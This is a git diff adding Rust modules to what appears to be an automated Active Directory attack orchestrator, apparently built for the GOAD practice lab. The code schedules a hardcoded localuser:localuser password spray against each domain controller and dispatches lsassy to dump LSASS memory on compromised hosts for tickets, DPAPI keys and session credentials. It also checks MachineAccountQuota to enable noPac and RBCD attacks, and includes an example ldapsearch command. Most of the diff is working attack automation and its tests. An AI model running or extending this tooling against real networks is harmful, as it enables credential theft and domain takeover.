+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LDAP_SIGNING, "ldap_sign:192.168.58.10".into());
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam credential available
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_ldap_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
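+
+ // Illustrative sketch: replicates the cross-domain check in auto_ldap_signing.
+ // When the selected credential's domain differs from the target domain, a
+ // "bind_domain" hint is attached to the payload (mirroring the dispatch loop above).
+ #[test]
+ fn cross_domain_credential_adds_bind_domain() {
+ let cred = make_credential("fabuser", "Fab!Pass1", "fabrikam.local"); // pragma: allowlist secret
+ let target_domain = "contoso.local";
+ let cross_domain = cred.domain.to_lowercase() != target_domain.to_lowercase();
+ assert!(cross_domain);
+ let mut payload = json!({ "technique": "ldap_signing_check" });
+ if cross_domain {
+ payload["bind_domain"] = json!(cred.domain);
+ }
+ assert_eq!(payload["bind_domain"], "fabrikam.local");
+ }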
+}
diff --git a/ares-cli/src/orchestrator/automation/localuser_spray.rs b/ares-cli/src/orchestrator/automation/localuser_spray.rs
new file mode 100644
index 00000000..734a6914
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/localuser_spray.rs
@@ -0,0 +1,294 @@
+//! auto_localuser_spray -- test localuser/localuser credentials across domains.
+//!
+//! GOAD configures a `localuser` account with username=password across all three
+//! domains. In one domain this user has Domain Admin privileges. This module
+//! specifically tests the localuser:localuser credential combo against each
+//! discovered DC, which standard password spraying may miss if it doesn't
+//! include "localuser" in its wordlist.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect localuser spray work items from current state.
+///
+/// Pure logic extracted from `auto_localuser_spray` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_localuser_spray_work(state: &StateInner) -> Vec<LocaluserWork> {
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("localuser:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_LOCALUSER_SPRAY, &dedup_key) {
+ continue;
+ }
+
+ items.push(LocaluserWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ });
+ }
+
+ items
+}
+
+/// Tests localuser:localuser credentials against each domain.
+/// Interval: 45s.
+pub async fn auto_localuser_spray(
+ dispatcher: Arc<Dispatcher>,
+ mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("localuser_spray") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_localuser_spray_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "smb_login_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": item.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("localuser_spray");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "localuser credential spray dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LOCALUSER_SPRAY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LOCALUSER_SPRAY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "localuser spray deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch localuser spray");
+ }
+ }
+ }
+ }
+}
+
+struct LocaluserWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ // --- collect_localuser_spray_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_localuser_spray_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into());
+ let work = collect_localuser_spray_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn collect_no_credentials_needed() {
+ // localuser_spray does NOT require existing credentials (it uses hardcoded localuser:localuser)
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ assert!(state.credentials.is_empty());
+ let work = collect_localuser_spray_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("localuser:{}", "contoso.local");
+ assert_eq!(key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = json!({
+ "technique": "smb_login_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "smb_login_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["credential"]["username"], "localuser");
+ assert_eq!(payload["credential"]["password"], "localuser");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let work = LocaluserWork {
+ dedup_key: "localuser:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn no_credentials_needed_in_work_struct() {
+ // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser
+ let work = LocaluserWork {
+ dedup_key: "localuser:fabrikam.local".into(),
+ domain: "fabrikam.local".into(),
+ dc_ip: "192.168.58.20".into(),
+ };
+ assert_eq!(work.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "localuser:contoso.local");
+ }
+
+ #[test]
+ fn credential_uses_domain_from_target() {
+ let domain = "contoso.local";
+ let payload = json!({
+ "credential": {
+ "username": "localuser",
+ "password": "localuser",
+ "domain": domain,
+ },
+ });
+ assert_eq!(payload["credential"]["domain"], domain);
+ }
+
+ #[test]
+ fn per_domain_dedup() {
+ let domains = ["contoso.local", "fabrikam.local"];
+ let keys: Vec<String> = domains
+ .iter()
+ .map(|d| format!("localuser:{}", d.to_lowercase()))
+ .collect();
+ assert_eq!(keys.len(), 2);
+ assert_ne!(keys[0], keys[1]);
+ }
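+
+ // Illustrative sketch: collect_localuser_spray_work is pure, so collecting
+ // twice from the same state yields identical dedup keys. Dedup slots are only
+ // burned after a successful dispatch, in the async loop above.
+ #[test]
+ fn collect_is_pure_and_repeatable() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let first: Vec<String> = collect_localuser_spray_work(&state)
+ .into_iter()
+ .map(|w| w.dedup_key)
+ .collect();
+ let second: Vec<String> = collect_localuser_spray_work(&state)
+ .into_iter()
+ .map(|w| w.dedup_key)
+ .collect();
+ assert_eq!(first, second);
+ }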
+}
diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs
new file mode 100644
index 00000000..b60597d5
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs
@@ -0,0 +1,541 @@
+//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy.
+//!
+//! After secretsdump or other lateral movement marks a host as owned,
+//! this automation dispatches lsassy to dump LSASS process memory and
+//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.)
+//! that secretsdump alone doesn't capture.
+//!
+//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes,
+//! while lsassy gets live session credentials from LSASS memory.
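+//!
+//! Rough split (illustrative restatement):
+//!
+//! ```text
+//! secretsdump -> SAM / LSA secrets / NTDS hashes           (at-rest)
+//! lsassy      -> LSASS memory: session creds, tickets,
+//!                DPAPI keys                                (live)
+//! ```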
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect lsassy dump work items from current state.
+///
+/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_lsassy_work(state: &StateInner) -> Vec<LsassyWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Only target hosts we've already owned (secretsdump succeeded)
+ if !host.owned {
+ continue;
+ }
+
+ let dedup_key = format!("lsassy:{}", host.ip);
+ if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ // Skip when the host's domain is dominated AND every forest is fully
+ // owned. We still want LSASS dumps from owned hosts in a not-yet-fully-
+ // dominated lab (session creds may unlock cross-realm pivots), but once
+ // we have everything there is no point grinding more memory.
+ if !domain.is_empty()
+ && state.dominated_domains.contains(&domain)
+ && state.has_domain_admin
+ && state.all_forests_dominated()
+ {
+ continue;
+ }
+
+ // Find a credential for this host's domain
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && (domain.is_empty() || c.domain.to_lowercase() == domain)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ // Fall back to any admin credential
+ state
+ .credentials
+ .iter()
+ .find(|c| c.is_admin && !c.password.is_empty())
+ })
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(LsassyWork {
+ dedup_key,
+ host_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dumps LSASS credentials from owned hosts.
+/// Interval: 45s.
+pub async fn auto_lsassy_dump(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("lsassy_dump") {
+ info!("lsassy_dump technique not allowed — skipping");
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ let owned_count = state.hosts.iter().filter(|h| h.owned).count();
+ let cred_count = state.credentials.len();
+ if owned_count > 0 || cred_count > 0 {
+ info!(
+ owned_hosts = owned_count,
+ credentials = cred_count,
+ "lsassy_dump tick: checking for work"
+ );
+ }
+ collect_lsassy_work(&state)
+ };
+
+ if !work.is_empty() {
+ info!(count = work.len(), "lsassy_dump work items collected");
+ }
+
+ for item in work {
+ let payload = json!({
+ "technique": "lsassy_dump",
+ "target_ip": item.host_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("lsassy_dump");
+ match dispatcher
+ .force_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.host_ip,
+ hostname = %item.hostname,
+ "LSASS dump dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ info!(host = %item.host_ip, "LSASS dump deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump");
+ }
+ }
+ }
+ }
+}
+
+struct LsassyWork {
+ dedup_key: String,
+ host_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_owned_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: true,
+ }
+ }
+
+ fn make_unowned_host(ip: &str, hostname: &str) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ // --- collect_lsassy_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_unowned_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_unowned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_owned_host_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.30");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into());
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_admin_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ // Only admin cred from different domain + quarantine the matching one
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ state.credentials.push(make_admin_credential(
+ "domadmin",
+ "Admin!1",
+ "fabrikam.local",
+ )); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "domadmin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[test]
+ fn collect_bare_hostname_matches_any_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_owned_host("192.168.58.30", "ws01"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_owned_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped_with_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("nopw", "", "contoso.local"));
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("lsassy:{}", "192.168.58.22");
+ assert_eq!(key, "lsassy:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "dc01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "lsassy_dump",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "lsassy_dump");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = LsassyWork {
+ dedup_key: "lsassy:192.168.58.22".into(),
+ host_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "lsassy:192.168.58.22");
+ assert_eq!(work.host_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn domain_extraction_from_fabrikam() {
+ let hostname = "sql01.fabrikam.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_with_various_ips() {
+ let ips = ["192.168.58.10", "192.168.58.240", "192.168.58.1"];
+ for ip in &ips {
+ let key = format!("lsassy:{ip}");
+ assert!(key.starts_with("lsassy:"));
+ assert!(key.ends_with(ip));
+ }
+ }
+
+ #[test]
+ fn credential_preference_admin_flag() {
+ let admin_cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "domainadmin".into(),
+ password: "AdminPass!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let regular_cred = ares_core::models::Credential {
+ id: "c2".into(),
+ username: "user1".into(),
+ password: "UserPass!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let creds = [regular_cred, admin_cred];
+ // Fallback logic: find admin credential
+ let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty());
+ assert!(admin.is_some());
+ assert_eq!(admin.unwrap().username, "domainadmin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs
new file mode 100644
index 00000000..7c4b5a2e
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/machine_account_quota.rs
@@ -0,0 +1,342 @@
+//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain.
+//!
+//! The default MAQ of 10 allows any authenticated user to create computer
+//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD
+//! attacks. If MAQ > 0, downstream modules can proceed with machine account
+//! creation-based attacks.
+//!
+//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota
+//! attribute from the domain root.
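+//!
+//! As an illustrative sketch (not the worker's actual interface), the check
+//! boils down to a single LDAP read of the domain object, e.g. with OpenLDAP's
+//! `ldapsearch`:
+//!
+//! ```text
+//! ldapsearch -x -H ldap://<dc_ip> -D 'user@contoso.local' -w '<password>' \
+//!     -b 'DC=contoso,DC=local' -s base ms-DS-MachineAccountQuota
+//! ```
+//!
+//! A returned value > 0 marks the domain as worth targeting with the
+//! machine-account attacks listed above.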
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect MAQ work items from state (pure logic, no async).
+fn collect_maq_work(state: &StateInner) -> Vec<MaqWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("maq:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(MaqWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks MAQ setting per domain via LDAP query.
+/// Interval: 45s.
+pub async fn auto_machine_account_quota(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("machine_account_quota") {
+ continue;
+ }
+
+        let work: Vec<MaqWork> = {
+ let state = dispatcher.state.read().await;
+ collect_maq_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "machine_account_quota_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("machine_account_quota");
+ match dispatcher
